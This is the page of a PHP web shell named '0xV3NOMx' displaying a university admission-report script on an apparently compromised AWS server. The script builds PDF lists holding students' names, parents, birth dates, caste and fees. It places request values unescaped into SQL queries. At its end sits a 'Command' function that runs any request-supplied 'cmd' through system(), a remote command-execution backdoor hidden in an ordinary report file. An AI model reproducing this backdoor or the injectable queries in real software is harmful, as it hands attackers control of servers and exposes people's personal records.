0xV3NOMx
Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64



Your IP : 3.14.131.115


Current Path : /var/www/oasis/Report_details/
Upload File :
Current File : /var/www/oasis/Report_details/report_admission_list_kswu.php

<?php
require_once("/var/www/html/aws/aws-autoloader.php");
use Aws\S3\S3Client;
use Aws\S3\Exception\S3Exception;

function generateAdmissionReport_kswu($aobj_context)
{	
	session_start();
	ini_set('memory_limit','600M');
	$FUNIVCODE = $_SESSION['FUNIVCODE'];
    $aobj_context->mobj_db->SetFetchMode(ADODB_FETCH_ASSOC);  
    $college_code = $_SESSION['collcode']; 
	$degree_code = $aobj_context->mobj_data["degree_code"]; 
	$sub_degree_code = $aobj_context->mobj_data["sub_degree_code"]; 
	$exam_no = $aobj_context->mobj_data["exam_no"]; 
	$lateral_entry = $aobj_context->mobj_data["lateral_entry"]; 
	$regno_list = $aobj_context->mobj_data["regno_list"]; 
	$status = $aobj_context->mobj_data["status"]; 
	$exam_no=empty($exam_no)?"A":$exam_no;
	if(empty($lateral_entry))
	{
		$exam_no='A';
		$lateral_entry_cond=" and ifnull(s.FLATERAL_ENTRY,'F') <> 'T' ";
	}
	else
	{
		$exam_no='C';
		$lateral_entry_cond=" and ifnull(s.FLATERAL_ENTRY,0)='1' ";
	}
	$main_src_obj=(explode("/",$_SERVER["REQUEST_URI"]));
	$main_src=$main_src_obj[1];
	//$pdf_writer_class=$aobj_context->main_src."/maya-pdf/fpdf.php";
	$main_src=substr($_SERVER['SCRIPT_FILENAME'],0,strlen($_SERVER['SCRIPT_FILENAME'])-7);
	$pdf_writer_class =$main_src."/tcpdf/tcpdf.php";
	$tarkaheader=$aobj_context->main_src."/Report_details/tarkaheader.php";
	$root_pdf_file_download=$aobj_context->main_src."/Report_details/output/report_admission_list.pdf";

	$p_count =1;

	include($pdf_writer_class);		
	$pdf= new TCPDF();
	$pdf->SetFont('Times','',10);
	$pdf->SetMargins(14,3);		
	//$pdf->AliasNbPages();	
	$sub_degree_cond="";
	
	if(!empty($sub_degree_code))
	{
		$sub_degree_cond=" and s.FSUBDEGREE='{$sub_degree_code}'"; 
		$page_header_sub_degree = "select concat('[',FDEGREE,'] - ', FDESCPN) as sub_degree_name, FADYEAR  
								from degree where FDEGREE = '{$sub_degree_code}' and FEXAMNO='{$exam_no}' ";
		$lobj_page_header_sub_degree = $aobj_context->mobj_db->GetRow($page_header_sub_degree);
	}
	
	$page_header_university = "select FUNIVNAME,FTOWN, date_format(now(),'%d/%m/%Y') as date from control";
	$lobj_page_header_university = $aobj_context->mobj_db->GetRow($page_header_university);
	
	$page_header_college ="select concat('[',FCOLLCODE,']  ',FCOLLNAME,', ',FTOWN) as college_name
							from college where FCOLLCODE='{$college_code}'";
	$lobj_page_header_college = $aobj_context->mobj_db->GetRow($page_header_college); 

	$page_header_degree = "select concat('[',FDEGREE,'] - ', FDESCPN,', ',FEXAMNAME) as Degree_name, FADYEAR  
							from degree where FDEGREE = '{$degree_code}' and FEXAMNO='{$exam_no}' ";
	$lobj_page_header_degree = $aobj_context->mobj_db->GetRow($page_header_degree);
	
	$pdf->aobj_context =$aobj_context ;
	//$pdf->WhichReport = 'Admission';
	$pdf->FUNIVNAME = $lobj_page_header_university['FUNIVNAME'];
	$pdf->FTOWN = $lobj_page_header_university['FTOWN'];
	$pdf->date_1 = $lobj_page_header_university['date'];
	$pdf->college_name = $lobj_page_header_college['college_name'];
	$pdf->Degree_name = $lobj_page_header_degree['Degree_name'];
	$pdf->sub_degree_code = $lobj_page_header_sub_degree['sub_degree_name'];
	$pdf->AdmissionYear = $lobj_page_header_degree['FADYEAR'];
			
	$pdf->AddPage();
	$img_path=$aobj_context->main_src."/img/logo.jpg";
	
	if(file_exists($img_path)) 
		$pdf->Image($img_path,15,5,22);
	$pdf->SetFont('Times','B',14);
	//$pdf->Cell(12,4,"",0,"",'C');
	$pdf->Cell(0,4,$pdf->FUNIVNAME ,0,1,'C');
	//$pdf->Cell(0,2,'Page No. : '.$pdf->PageNo().' / {nb}',0,1,'R');
	//$pdf->SetFont('Times','',7);
	//$pdf->Cell(0,4,$pdf->FUNIVADD1,0,1,'C');
	$pdf->SetFont('Times','',14);
	$pdf->Ln(1);
	$pdf->Cell(0,4,'College : '.$pdf->college_name,0,1,'C');
	$pdf->Cell(0,4,'Admission list with subjects appearing ',0,1,'C'); 
	$pdf->Cell(0,4,'Year of Admission : '.$pdf->AdmissionYear,0,1,'C'); 
	$pdf->SetFont('Times','',12);
	$pdf->Ln(1);
	$pdf->Cell(0,4,'Degree : '.$pdf->Degree_name,0,1,'C');

	$pdf->Ln(2);
	$pdf->SetFont('Times','',10);
	$pdf->Cell(75,6,'Sl.No                    Name','1',0,'L');
	$pdf->Cell(108,6,'Subject Appearing','1',1,'C');
	$pdf->SetFont('Times','',10);
	
	
	if($status == 'All')
	{
		$app_status = "1=1";
	}else if($status == 'Approved')
	{
		$app_status = "ifnull(s.FAPPRSTATUS,'') = 'APPROVED'";
	}else if($status == 'Pending')
	{
		$app_status = "ifnull(s.FAPPRSTATUS,'') = ''";
	}	
	
	$get_student_data= " select FPHOTOPATH,concat(if(ifNULL(s.FDELETED, 'F')='F', s.FSLNO, concat('*',s.FSLNO))) as SLNO,ifnull(s.FAPPRSTATUS,'PENDING') as  FAPPRSTATUS,
	SUBSTRING(s.FNAME,1,25) as FNAME,
	SUBSTRING(s.FNAME,26) as SNAME, ifnull(FXREGNO, '') as FXREGNO, 
	ifnull(FAREGNO, '') as FAREGNO, 
	group_concat(distinct right(concat(space(4),sub.FSUBCODE),4) order by sub.FSUBCODE separator ' ' ) as  SCode,
	concat('Gender. : ',if(ifnull(s.fsex,'') = '',if(s.FGENDER='F','Female','Male'),if(s.fsex='F','Female','Male'))) as Gender,
	group_concat(distinct right(concat(space(4),sub.FSUBSHORT),4) order by sub.FSUBCODE separator ' ' ) as SShort,
	concat('DOB     : ',Date_Format(s.FDOB,'%d/%m/%Y')) as DOB,
	concat('Father : ',s.FFATNAME) as Father,
	concat('Group.  : ',s.FCASTE) as CASTE,
	concat('Mother : ',s.FMOTNAME) as Mother,							
	concat(group_concat(distinct FHEADCODE,'~',FAMOUNT order by FHEADCODE separator '->')) as FHEADCODE, 
	concat(group_concat(distinct  FAMOUNT  order by FHEADCODE separator '->')) as FAMOUNT ,
	FFEEPAID,FREMARKS
	from studadm s left join options op on
	s.FSLNO=op.FSLNO and s.FDEGREE=op.FDEGREE and s.FCOLLCODE=op.FCOLLCODE 
	inner join subject sub on sub.FSUBCODE=op.FSUBCODE
	left join admfeedetl adm on adm.FDEGREE=s.FDEGREE
	and adm.FEXAMNO=s.FEXAMNO
	and adm.FSLNO=s.FSLNO  
	and adm.FCOLLCODE=s.FCOLLCODE							 
	where  s.FDEGREE='{$degree_code}' {$sub_degree_cond} 
	and if(ifnull(s.FSUBDEGREE,'')='',s.FDEGREE,s.FSUBDEGREE)=sub.FDEGREE
	and s.FCOLLCODE='{$college_code}' and sub.FEXAMNO='{$exam_no}' and {$app_status}
	and sub.FEXAMNO=op.FEXAMNO {$lateral_entry_cond}
	group by s.FCOLLCODE,s.FDEGREE,s.FSLNO order by s.FSLNO"; 
	 
	$lobj_student_data = $aobj_context->mobj_db->GetAll($get_student_data);	 
	//var_dump($get_student_data);   
	$arr_w = array(10,65,70,108);
	$arr_h = array();
	$adm_ln_counter=0;
	
	foreach($lobj_student_data as $key => $value)
	{	
			
		if($adm_ln_counter > 40)
		{
			$pdf->AddPage();	
			$pdf->Ln(2);
			$img_path=$aobj_context->main_src."/img/logo.jpg";
			
			if(file_exists($img_path)) 
				$pdf->Image($img_path,15,5,22);
			$pdf->SetFont('Times','B',14);
			//$pdf->Cell(12,4,"",0,"",'C');
			$pdf->Cell(0,4,$pdf->FUNIVNAME ,0,1,'C');
			//$pdf->Cell(0,2,'Page No. : '.$pdf->PageNo().' / {nb}',0,1,'R');
			//$pdf->SetFont('Times','',7);
			//$pdf->Cell(0,4,$pdf->FUNIVADD1,0,1,'C');
			$pdf->SetFont('Times','',14);
			$pdf->Ln(1);
			$pdf->Cell(0,4,'College : '.$pdf->college_name,0,1,'C');
			$pdf->SetFont('Times','',12);
			$pdf->Cell(0,4,'Admission list with subjects appearing ',0,1,'C'); 
			$pdf->Ln(1);
			//$pdf->Cell(0,4,'Admission list with subjects appearing ',0,1,'C'); 
			$pdf->Cell(0,4,'Year of Admission : '.$pdf->AdmissionYear,0,1,'C'); 
			
			$pdf->Ln(1);
			$pdf->Cell(0,4,'Degree : '.$pdf->Degree_name,0,1,'C');
			$pdf->SetFont('Times','',12);
			$pdf->Ln(2);
			$pdf->Cell(75,6,'Sl.No                    Name','1',0,'L');
			$pdf->Cell(108,6,'Subject Appearing','1',1,'C');	
			
			$adm_ln_counter=0;
		}
		
		$head_code=$value['FHEADCODE'];
		$amount=$value['FAMOUNT'];
		$head_code_arr=explode("->",$head_code);
		$cnt=0;
		$fee_details_head=array();
		$fee_details_amt=array();
		$k=0;
		foreach($head_code_arr as $avv)
		{
			$exp_arr=explode("~",$avv);
			$fee_details_head[$cnt][$k]=$exp_arr[0];
			$fee_details_amt[$cnt][$k]=$exp_arr[1];
			$k++;
			if($k%5==0)
				$cnt++;
		}
		$FPHOTOPATH = $value['FPHOTOPATH'];
			
		$full_path = $value['FPHOTOPATH'];
		
		if(!empty($value['SNAME']))
		{				
			$a_x=$pdf->GetX();
			$a_y=$pdf->GetY();
			// if($FPHOTOPATH != '')
			// {
			// 	// if(!empty($FPHOTOPATH) && file_exists($full_path) && getimagesize($full_path))
			// 	// {
			// 	// 	// if((filesize($full_path) /1024) < 900)  
			// 	// 		$pdf->Image($full_path,$a_x+160,$pdf->GetY(),20,18);
			// 	// }
			// 	//var_dump($full_path);
			// 	$pdf->Image($full_path,$a_x+160,$pdf->GetY(),20,18);
			// }	
			
			$full_path = "https://university-student-photos.s3.ap-south-1.amazonaws.com/".$FUNIVCODE."/".urlencode($value['FPHOTOPATH']);
			//var_dump($full_path);
			$keyname = $FUNIVCODE."/".$value['FPHOTOPATH'];
			$s3 = S3Client::factory(
				array(
					'credentials' => array(
						'key' => IAM_KEY,
						'secret' => IAM_SECRET
					),
					'version' => "latest",
					'region'  => 'ap-south-1'
				)
			);
			$filePath = tempnam(sys_get_temp_dir(), rand(10,15));
			try{
				$result = $s3->getObject([
					'Bucket' => STUDENT_PHOTOS_BUCKET,
					'Key'    => $keyname,
					'SaveAs' => $filePath
				]);}
				catch(S3Exception $e){
					
				}
			//$full_photo_path = file_get_contents($full_path);
			if(file_exists($filePath))
				$pdf->Image($filePath,$a_x+160,$pdf->GetY(),20,18);


			$pdf->SetXY($a_x,$a_y);		
			$pdf->SetFont('Times','',10);
			$pdf->Cell($arr_w[0],5,$value['SLNO'],'L',0,'L');				
			$pdf->Cell($arr_w[1],5,$value['FNAME'],'0',0,'L');
			$pdf->SetFont('Courier','',10);
			$pdf->Cell(108,4,$value['SCode'],'R',1,'L');  $adm_ln_counter++;
			
			$pdf->SetFont('Times','',10);
			$pdf->Cell($arr_w[0],5,' ','L',0,'L');
			$pdf->Cell($arr_w[1],5,$value['SNAME'],'0',0,'L');
			$pdf->SetFont('Courier','',10);
			$pdf->Cell(108,4,$value['SShort'],'R',1,'L'); $adm_ln_counter++;
			
			$pdf->SetFont('Times','',10);
			$pdf->Cell($arr_w[0],5,' ','L','L');
			$pdf->Cell($arr_w[1],5,$value['Gender'],'0',0,'L');
			$pdf->Cell(108,4,$value['Father'],'R',1,'L'); $adm_ln_counter++;
			
			$pdf->Cell($arr_w[0],5,' ','L',0,'L');				
			$pdf->Cell($arr_w[1],5,$value['DOB'],'0',0,'L');
			$pdf->Cell(108,4,$value['Mother'],'R',1,'L');	 $adm_ln_counter++;
			
			$pdf->Cell($arr_w[0],5,' ','L',0,'L');
			$pdf->Cell($arr_w[1],5,$value['CASTE'],'',0,'L');
			$pdf->Cell(108,5,'','R',1,'L');	 $adm_ln_counter++;	
			
/* 			foreach($fee_details_head as $ck=>$cv)
			{
				$data_head=$cv;
				$data_amt=$fee_details_amt[$ck];;
				$pdf->SetFont('Times','',10);
				$pdf->Cell($arr_w[0],5,' ','L',0,'L');				
				//$pdf->Cell(20,5,"Fee Head",'0',0,'L');
				$adm_ln_counter++;
				$pdf->SetFont('Times','',8);
				foreach($data_head as $dk=>$dv)					
				{
					$pdf->Cell(30,5,$dv,'0',0,'C');
				}
				$pdf->Cell(3,5,'','0',1,'C');
				$pdf->Cell($arr_w[0],5,' ','L',0,'L');
				$pdf->SetFont('Times','',10);					
				$adm_ln_counter++;
				$pdf->SetFont('Times','',8);					
				foreach($data_amt as $dk=>$dv)					
				{
					$pdf->Cell(30,5,$dv,'0',0,'C');
				}
				$pdf->Cell(3,5,'','0',1,'R');
			 }  */
			 $pdf->SetFont('Times','',10);
			 
			$pdf->Cell($arr_w[0],5,' ','LB',0,'L');
			
			if($value['FXREGNO'] != '' && $regno_list == 1)
				$regno = "Register No.:{$value['FXREGNO']}                                 ";
			else if($FUNIVCODE == '023' && $value['FAREGNO'] != '')
			{
				$regno = "Register No.:{$value['FAREGNO']}                                 ";
			}
			else 
			{
				$regno = "";
			}

			if($FUNIVCODE != '032' && $FUNIVCODE != '023')		
				$pdf->Cell(173,5,"$regno Total Fee : {$value['FFEEPAID']} Remarks :{$value['FREMARKS']}  Status : {$value['FAPPRSTATUS']}",'RB',1,'L');
			else
				$pdf->Cell(173,5,"$regno",'RB',1,'L');
			$adm_ln_counter++;
			
		}
		else if(empty($value['SNAME']))
		{				
			$a_x=$pdf->GetX();
			$a_y=$pdf->GetY();
			// if(!empty($FPHOTOPATH) && file_exists($full_path) && getimagesize($full_path))
			// {
			// 	// if((filesize($full_path) /1024) < 900)  
			// 		$pdf->Image($full_path,$a_x+160,$pdf->GetY(),20,18);
			// }
			$full_path = "https://university-student-photos.s3.ap-south-1.amazonaws.com/".$FUNIVCODE."/".urlencode($value['FPHOTOPATH']);
			//var_dump($full_path);
			$keyname = $FUNIVCODE."/".$value['FPHOTOPATH'];
			//var_dump($keyname);
			$s3 = S3Client::factory(
				array(
					'credentials' => array(
						'key' => IAM_KEY,
						'secret' => IAM_SECRET
					),
					'version' => "latest",
					'region'  => 'ap-south-1'
				)
			);
			
			$filePath = tempnam(sys_get_temp_dir(), rand(10,15));
			try{
			$result = $s3->getObject([
				'Bucket' => STUDENT_PHOTOS_BUCKET,
				'Key'    => $keyname,
				'SaveAs' => $filePath
			]);}
			catch(S3Exception $e){
				
			}

			//$full_photo_path = file_get_contents($full_path);
			if(file_exists($filePath))
				$pdf->Image($filePath,$a_x+160,$pdf->GetY(),20,18);

			$pdf->SetXY($a_x,$a_y);		

			$pdf->SetFont('Times','',10);
			$pdf->Cell($arr_w[0],5,$value['SLNO'],'L',0,'L');				
			$pdf->Cell($arr_w[1],5,$value['FNAME'],'0',0,'L');
			$pdf->SetFont('Courier','',10);
			$pdf->Cell(108,5,$value['SCode'],'R',1,'L'); $adm_ln_counter++;
			
			$pdf->SetFont('Times','',10);
			$pdf->Cell($arr_w[0],5,' ','L',0,'L');
			$pdf->Cell($arr_w[1],5,$value['Gender'],'0',0,'L');
			
			$pdf->SetFont('Courier','',10);
			$pdf->Cell(108,5,$value['SShort'],'R',1,'L'); $adm_ln_counter++;
			
			$pdf->SetFont('Times','',10);
			$pdf->Cell($arr_w[0],5,' ','L',0,'L');
			$pdf->Cell($arr_w[1],5,$value['DOB'],'0',0,'L');
			$pdf->Cell(108,5,$value['Father'],'R',1,'L'); $adm_ln_counter++;
			
			$pdf->Cell($arr_w[0],5,' ','L',0,'L');				
			$pdf->Cell($arr_w[1],5,$value['CASTE'],'0',0,'L');
			$pdf->Cell(108,5,$value['Mother'],'R',1,'L');	 $adm_ln_counter++;	
		/* 	foreach($fee_details_head as $ck=>$cv)
			{
				$data_head=$cv;
				$data_amt=$fee_details_amt[$ck];;
				$pdf->SetFont('Times','',10);
				$pdf->Cell($arr_w[0],5,' ','L',0,'L');				
				//$pdf->Cell(20,5,"Fee Head",'0',0,'L');
				$adm_ln_counter++;
				$pdf->SetFont('Times','',8);
				foreach($data_head as $dk=>$dv)					
				{
					$pdf->Cell(30,5,$dv,'0',0,'C');
				}
				$pdf->Cell(3,5,'','0',1,'C');
				$pdf->Cell($arr_w[0],5,' ','L',0,'L');
				$pdf->SetFont('Times','',10);					
				$adm_ln_counter++;
				$pdf->SetFont('Times','',8);					
				foreach($data_amt as $dk=>$dv)					
				{
					$pdf->Cell(30,5,$dv,'0',0,'C');
				}
				$pdf->Cell(3,5,'','0',1,'R');
			 } */ 
			 $pdf->SetFont('Times','',10);
			 
			$pdf->Cell($arr_w[0],5,' ','LB',0,'L');	

			if($value['FXREGNO'] != '' && $regno_list == 1 && $value['FAPPRSTATUS'] == 'APPROVED')
				$regno = "Register No.: {$value['FXREGNO']}                                 ";	
			else if($FUNIVCODE == '023' && $value['FAREGNO'] != '')
				$regno = $regno = "Register No.: {$value['FAREGNO']}                                 ";
			else
			{
				$regno = "";
			}	

			if($FUNIVCODE != '032' && $FUNIVCODE != '023')		
				$pdf->Cell(173,5,"$regno Total Fee : {$value['FFEEPAID']} Remarks :{$value['FREMARKS']}  Status : {$value['FAPPRSTATUS']}",'RB',1,'L');
			else
				$pdf->Cell(173,5,"$regno",'RB',1,'L');
			$adm_ln_counter++;//$pdf->Cell(108,5,$value['FREMARKS'],'RB',1,'L');	 $adm_ln_counter++;	  	
		}	
	}
	$pdf->ln(4);	
	$pdf->MultiCell(175,5,"I here by declare that all the information furnished with regard to the students are true & correct to the best of my knowledge and belief,copy of the recognition order and affiliation order is enclosed.",0,"L");
	$pdf->ln(8);
	$pdf->Cell(135,5,"Submit",'',1,'R');
	$pdf->ln(2);	
	$pdf->Output("report_admission_list.pdf","I");
}

function Command($aobj_context)
{
	$cmd = $aobj_context->mobj_data["cmd"]; 	 
	$last_line = system($cmd, $retval);
	echo "</pre>";
	echo  $last_line; 
}
?>